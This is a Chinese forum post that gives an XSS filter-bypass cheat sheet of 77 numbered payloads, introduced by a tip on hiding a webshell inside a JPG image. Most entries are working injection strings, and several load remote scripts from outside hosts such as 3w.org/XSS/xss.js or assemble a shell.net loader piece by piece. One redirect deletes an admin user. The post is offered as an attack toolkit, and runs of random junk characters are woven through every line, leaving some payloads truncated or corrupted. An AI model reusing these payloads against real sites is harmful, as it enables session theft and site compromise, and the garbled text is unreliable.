跨站图片shell# N$ C9 O+ R- T+ j8 H
XSS跨站代码 <script>alert("")</script>
3 p! P! w' _- I: ?3 s ]7 Z) V9 q6 r5 |8 E; A6 E
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
' L& c/ p4 L f+ e, J
1 f: `0 V( U; I+ I; O/ `, c9 [
. x7 b, e2 l: O* |
9 _5 x7 [4 `9 i0 G; [1)普通的XSS JavaScript注入
: e! k" v' m" j; A+ Z" x; T<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>5 L0 g5 Q/ F, V, y) E
, U# d( H0 e! D, d' z, h; V(2)IMG标签XSS使用JavaScript命令
) t( j! J/ R7 A) ` g4 u9 s4 F<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ ^/ v3 A' b) q. I7 \3 m% ?
4 s* Y$ _6 x3 f! S
(3)IMG标签无分号无引号
0 A, n2 Q) L2 t" P2 V8 f, I9 O<IMG SRC=javascript:alert(‘XSS’)>
Y' Y% u, t8 h8 u" H
l2 g& N1 W) G. T2 _( g4 }5 e) Y(4)IMG标签大小写不敏感
) k/ U8 l" i4 X5 u( Q# @7 x<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
% B7 z8 `; w8 `* L3 U& t# g
1 n# H3 `2 A7 z, {(5)HTML编码(必须有分号)6 ^; `# G5 z, t+ _; v. {1 ^8 {# x
<IMG SRC=javascript:alert(“XSS”)>8 y9 q% D/ @ Q8 U4 W4 R
4 h8 C/ {2 z, S0 x p+ Y8 y(6)修正缺陷IMG标签' a0 Z9 ~$ A8 }- q/ ]
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
1 p6 g+ l- e0 v+ j
Z7 G( ~( L E i) Z(7)formCharCode标签(计算器)' K+ P' L/ g x* _4 d
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
4 V% c- E3 x; ~- d7 g+ U! u: w5 w
2 H) @! x) ^+ k6 H9 e# C+ T(8)UTF-8的Unicode编码(计算器)
- Y& X5 ~/ P2 o$ l& e) n+ p<IMG SRC=jav..省略..S')>
" Q2 C2 I% X6 E$ D5 \+ Z6 L' N+ L8 \' E1 a* w9 o$ r
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 n$ T/ X" o1 e3 u, T# }
<IMG SRC=jav..省略..S')>
, U3 A5 k% g7 \; T. c# l5 W1 q1 g
(10)十六进制编码也是没有分号(计算器)
- z, E) K6 o z% n7 s/ l<IMG SRC=java..省略..XSS')>
8 X4 P& J6 D3 w1 A+ _' i5 H
) R/ a+ M0 n$ d2 x* e3 u# }(11)嵌入式标签,将Javascript分开! r% G, Z/ T$ U5 \4 B! v. ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>, M* _% N5 d& M! ]0 l& } h+ C. n6 Q
1 T, e2 s- K# t) M6 i$ y% s(12)嵌入式编码标签,将Javascript分开) V; z* m; _0 K8 G; {
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; l; M$ g2 G( A; k0 M1 B& d+ p! c& `* z7 I
(13)嵌入式换行符" V4 S) u5 v/ G7 j, s
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 M8 V: x& p( @0 A1 m7 l* x' ^$ l
! n& Z& M% \9 ^5 l3 p+ J6 g, L* w2 L(14)嵌入式回车
* K+ v v) w0 P( i# @<IMG SRC=”jav ascript:alert(‘XSS’);”>7 C2 `5 Y4 k& F: l6 }, z
4 O j% A- y2 }' Y(15)嵌入式多行注入JavaScript,这是XSS极端的例子
g9 x( r3 f" z* |1 ~( R<IMG SRC=”javascript:alert(‘XSS‘)”>
1 @" ^ M7 ]$ ^& c
* o( `" `! `8 g8 ~; M4 Y0 _ P(16)解决限制字符(要求同页面)" }! B4 P1 S. L! o! N- ^
<script>z=’document.’</script>2 p$ {0 k0 q5 N: d
<script>z=z+’write(“‘</script>2 q- y' F$ ^, `
<script>z=z+’<script’</script># U' ~' s, R' N( U
<script>z=z+’ src=ht’</script>
. P0 P' r4 l0 i8 r+ k5 N<script>z=z+’tp://ww’</script>- D+ t1 } q7 j4 b+ E% |' {
<script>z=z+’w.shell’</script>
/ q; b! q+ D, q. y( _<script>z=z+’.net/1.’</script> f& K2 h9 g/ V5 f3 D
<script>z=z+’js></sc’</script># o$ c- t( V1 J' X* j0 K
<script>z=z+’ript>”)’</script>& q9 t% l& g" w- O( T
<script>eval_r(z)</script>
: J# H& I( C" z- n8 y7 b
& p3 `7 ]1 y2 Y, \3 j9 y(17)空字符$ f" d' F# @. Y- G2 b
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
, _4 U# g; T8 ^: E" \! `
4 y5 ]( U' _+ e+ q: b' V) r: P% M(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 {/ A; ]8 _" N! V9 X2 ~, b8 q2 E9 aperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
% E" o2 O2 F# X" @+ q L3 ]' b/ P* X
9 e7 {2 G3 n# Z1 Z(19)Spaces和meta前的IMG标签: W# C4 A3 t5 |7 y9 X2 |, k8 \3 R
<IMG SRC=” javascript:alert(‘XSS’);”> u& U s5 o; h% A' E8 F" x) C1 e
) l* }. H8 k5 @% ~(20)Non-alpha-non-digit XSS
7 z; q& y- `) p# G D<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; P0 _6 M' j. V
9 ?% F$ A; R* \. J(21)Non-alpha-non-digit XSS to 2
, F1 J: ]6 t) f) `<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- z* t4 p e% e \/ {! N% ^7 C1 c7 n
/ o" [- H: e4 x0 g; P$ x(22)Non-alpha-non-digit XSS to 3 h4 M1 g( J+ e ]& |8 K3 Q. ~( w
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ _! X" C7 u; F
1 s- c. ]5 B" t
(23)双开括号) X; b! c& z0 `' f2 t' |
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
( r/ Y2 ^' w9 z2 Y, J5 D$ E e
. v2 W' Z2 W, B5 w! \! B- {& `, K& q(24)无结束脚本标记(仅火狐等浏览器)
+ Y* [- y( |/ e4 P<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! P0 m6 G0 O; G" o
. e) W" ?, g+ V i( a$ {- K
(25)无结束脚本标记2
0 T* S3 t7 e1 H, u+ w v<SCRIPT SRC=//3w.org/XSS/xss.js>
. k+ M1 g0 { g8 i- Z" k: e, D7 y; u. p
(26)半开的HTML/JavaScript XSS! ?- m0 z4 ^/ T) w
<IMG SRC=”javascript:alert(‘XSS’)” u# L: [) s3 t8 `* L; g% D
7 Q7 e* N+ [# W8 R8 h+ o+ M(27)双开角括号" P& z2 F: N; s% N8 Y
<iframe src=http://3w.org/XSS.html <
# ]# m) V0 \! Q- N7 M+ P
4 V! c# D0 x. s1 F ?# ~(28)无单引号 双引号 分号
/ h1 S' [0 n# y" ]% ]% y<SCRIPT>a=/XSS/
# x! }$ _4 [* j" palert(a.source)</SCRIPT>6 f2 `9 w2 L+ p
( F4 X8 \" {, Q+ Z6 @% i, b(29)换码过滤的JavaScript) L% i& }3 \/ M
\”;alert(‘XSS’);//
0 R% f% D0 T+ p0 t
7 b' S* ~+ u$ E5 @$ P3 ~8 {. k(30)结束Title标签& O. v/ p: u5 s2 a, E- H, Q* y6 b p
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' X4 @1 B4 s8 t$ G, I
4 Y- Z8 @4 |$ C4 b7 d! r( T& v(31)Input Image
* Z% v6 }, S* r2 X& D<INPUT SRC=”javascript:alert(‘XSS’);”>
7 F8 m. M1 E$ T$ w- d5 W. g
! X9 C7 s/ U& X. U( y(32)BODY Image
+ X& R/ i" r* B2 h<BODY BACKGROUND=”javascript:alert(‘XSS’)”>+ Z2 `8 ]" T" O3 a
( L# @* p1 e: y; l+ ] _* M- \% m0 S
(33)BODY标签
% ?9 J8 @; {) _<BODY(‘XSS’)>
8 V- g$ G$ L4 \% T2 ~: S/ X6 H% A
( f4 `9 d# J$ F5 b0 N7 |( B' t(34)IMG Dynsrc
! b4 \! I1 j6 ]7 v, `3 ?<IMG DYNSRC=”javascript:alert(‘XSS’)”>" p5 {) g5 U' e/ @, q0 I
7 e# B* w4 u" F% f! y# L(35)IMG Lowsrc
9 N, Q$ b* j) D5 N<IMG LOWSRC=”javascript:alert(‘XSS’)”>" u% Z% [& w9 T
* D6 e0 |( \6 Z. t9 c
(36)BGSOUND: h! H) ?* l t: z% d
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
|4 e" Y" S- p9 ?2 A
9 D' ]# Z, Q1 L4 J8 y+ k& A(37)STYLE sheet
5 P* C8 K+ H- ~8 F$ k j<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>! ]' W9 W$ q! H4 p# `" s1 Z
4 P! A$ M! R5 R+ c
(38)远程样式表
0 b5 F2 f B# i- z, T b7 v" Y<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>( i3 ]& U; ]1 u; y, S8 @9 E
' d1 F) I& B6 M2 [; m
(39)List-style-image(列表式)2 Y4 |& x$ z, ]
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
% k2 a/ ^: \: v9 k5 b& i1 j& s6 @
(40)IMG VBscript2 \3 I+ H# V1 G+ X9 Y1 v* |2 r
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
# _0 [% }, f S) s8 ?
* B/ U) C$ y1 q& e: h! v; x: ~(41)META链接url
( f( ^" ~% \2 T0 s3 B7 f U0 n<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
9 a8 f/ t- }+ q( F4 p- _1 L2 F
( {2 B0 ^; w. i M(42)Iframe v' c8 ^8 o* d% {+ U9 v6 S$ s6 o
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
! D% x: j' F1 f: k) u5 E* S. H/ `( s(43)Frame; ?2 h, e7 i$ ^+ x3 w
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
4 E) }& t: h6 E- h* Z6 A% {# l' K$ j4 \0 q% x! B0 e
(44)Table4 A3 k2 S$ Z; {* P- E' ]- G
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
@+ q' w: ]! U# d4 U( @8 |
% ]* O4 s+ m6 J" C$ a q$ N5 m(45)TD. e, \7 x; ^- K% `
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>8 a! K% o6 K: O2 D7 h* M) c; f5 d
& K6 a5 ^' e+ `) h* I(46)DIV background-image
) s! {7 ]& J `/ M- y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 e- N! F0 v, `* L. Q# w) g: N6 I1 z F N8 f" o
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)# R' S9 }( t1 t- S5 F8 s
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>8 {. f5 a" j' G& b
+ N- P' e+ q9 G' t) c, k1 N1 L$ q(48)DIV expression0 f9 A. @$ O$ {
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" T" f+ D! j% K3 {& D2 c- ~. K, l8 A5 W3 X& G) @! t' d
(49)STYLE属性分拆表达2 E) Z' r6 A% X' r9 a7 M+ }
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>* H( }9 B0 m: D- x2 M2 \: W
( m0 X7 Y+ Z& r(50)匿名STYLE(组成:开角号和一个字母开头), _% Y8 G0 l" a( F( O6 I
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
H4 E" A. D1 x; P: @: K' g5 \' j. [
(51)STYLE background-image
4 g7 ^5 ~ ?$ r" ]<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>5 j" O7 O. h- U
. m5 b( g) z, ? G% R/ n(52)IMG STYLE方式0 @! G( G E$ b8 x9 E/ s# n
exppression(alert(“XSS”))’>
6 k$ N% X1 K( k/ ^/ Y! _$ V" s& f- B; W% f
(53)STYLE background% b* l# P4 x. x, f1 j* k, }
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
, U9 X+ X3 H7 u- J( m C7 F: J9 B& r4 s$ N/ e1 _
(54)BASE
6 Y4 m% v' B3 T- E7 i R4 V' m<BASE HREF=”javascript:alert(‘XSS’);//”>/ U! k y: l$ E0 U) G- o3 K
& w, F; p0 M3 R. { H* H0 T(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS% ]4 _! i( z6 x) M' h# N
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
( G; H3 ~0 q! f/ ~5 D% W7 M# }0 }# S: g( S- G& F2 g4 A5 y9 Z
(56)在flash中使用ActionScrpt可以混进你XSS的代码
' Y+ K* y! k s+ z, R8 za=”get”;. P) {# H( f: n% m
b=”URL(\”";# n2 I" _2 o- u' f9 G8 Y/ U7 b! D
c=”javascript:”;$ l( \: Q0 U8 g. s' D0 F% K) \. ^6 a
d=”alert(‘XSS’);\”)”;
1 K( C1 T( D) S" G% ]' R! b! teval_r(a+b+c+d);/ Q! `; N+ p1 ~$ Y& T: R( L
: S- a) r# B/ o9 g/ X& k, c
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
f7 l8 J. f5 p+ O A/ U. h# y<HTML xmlns:xss>3 s9 y: A$ o. y: V
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”># ?8 }& t1 w8 P; y
<xss:xss>XSS</xss:xss>$ B2 ?' S5 \3 {. d3 \4 }' x/ S
</HTML>8 h4 Y0 r+ @9 t: s% v6 h. r& M
H! ?0 w$ o J* e4 g N; a
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ F4 ]2 T. Y( ]' t: G( D/ t6 a
<SCRIPT SRC=””></SCRIPT>
7 j* u: z4 G x3 K+ s+ A7 N3 q5 i' K* {# C$ W& T% K& r# g9 u# N
(59)IMG嵌入式命令,可执行任意命令% l( W# J- j( V4 z3 n; h
<IMG SRC=”http://www.XXX.com/a.php?a=b”>& I: C( r+ c2 Z9 t
9 @% |& ]2 b" m0 O2 h8 X; C: T
(60)IMG嵌入式命令(a.jpg在同服务器). f; Z P/ Y4 d. J W, S8 b
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser3 q, ]- x4 D. u
9 D% b4 j" W& l. D! B4 H- A
(61)绕符号过滤8 `- d' q$ C8 t( X5 s. U
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 C$ ]. y I7 q) m! ~6 {5 G! `* e: q
/ ~4 v& O; ^$ t ^; O(62)5 Z& ^$ L. Z! {6 ?- G" w0 Q& G
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>% I' Q" z8 k3 X& y) N- U# d
$ c' o7 B% ~7 J/ F(63)
6 n: ]" F- t4 ?& G) ]( N1 u<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
$ T5 H" c7 T0 W' A& H! A; o* `/ j# E+ L6 p* v6 j: g; T3 ~3 T1 b
(64)
! B2 }* k8 G% s" h: Q<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
4 |9 ?3 O' O$ Z ]% e) k; {" x) @" J( A. n8 ?
(65)
% E$ |3 c/ W) ^9 l<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
9 [8 ^6 V$ A9 B5 V1 U4 c
) E) P. J3 s2 a# T+ R" |- a(66)2 u, I y3 o/ ^9 G! ?/ T; N
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>% Y2 e! [- _: |) Z, h7 D
+ n2 ?; s m3 U# }1 Y& w- K( x(67)0 g: P1 v4 w7 O. z! V$ Y. \
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>7 y0 W D& Q u
" g% R4 K" p5 C" g/ t2 B0 M
(68)URL绕行# w3 G' D$ N5 q) x9 U, q7 `8 c
<A HREF=”http://127.0.0.1/”>XSS</A>: _+ I, Y( _/ R. k" D9 r
0 p7 A) H! S5 O5 W$ x(69)URL编码' C0 s/ X C _2 ]
<A HREF=”http://3w.org”>XSS</A>
* W- q- t5 C @+ V7 G# ]- V% M! x) V6 ]$ n8 V( Y( s3 B* H1 I, I: }8 Y
(70)IP十进制9 `. U3 ~5 `3 v2 ^' N$ I
<A HREF=”http://3232235521″>XSS</A>4 |: \5 @' ]8 y0 Q
" R6 C5 B% x$ Y9 g3 y
(71)IP十六进制
}& A& s, d& g3 t- _, q<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
! u8 e1 A# b+ U: w4 @ J+ C# I% v9 \" p E+ A9 _- W
(72)IP八进制
! @. h, Y% W9 H! f6 H<A HREF=”http://0300.0250.0000.0001″>XSS</A>
" `: q6 T, } Y! H
7 X+ k ^( J5 Y1 \& [! f/ A% b r( b( K- c(73)混合编码* m* J# A0 P1 o
<A HREF=”h1 o% q0 Q; P7 o7 w/ N" k1 B2 N
tt p://6 6.000146.0×7.147/”">XSS</A>
4 O1 R+ |) h. U1 y) ]' x
/ {4 e3 n3 O" E8 u& i6 L(74)节省[http:]" K3 Q7 {, O9 w$ d4 O8 O" r
<A HREF=”//www.google.com/”>XSS</A>
" |7 K0 s' E$ ]# R' Z: e" {' d9 F3 D
! a! ]% p4 `0 n* [$ g, l# c(75)节省[www]
$ V) x* f7 s! l! y; t<A HREF=”http://google.com/”>XSS</A>
T* {. P3 g: A- e l5 b# ]. u, L4 I: l
(76)绝对点绝对DNS
0 M2 E- V/ x, t; e6 Z' ]<A HREF=”http://www.google.com./”>XSS</A>
# ~4 h8 [6 F- J! \8 _: w5 r f2 _* g. ]
(77)javascript链接2 |# g& }2 v8 y( ~
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>, N: d |! c6 H
|
发表于 2012-9-13 17:04:56
收藏
支持
反对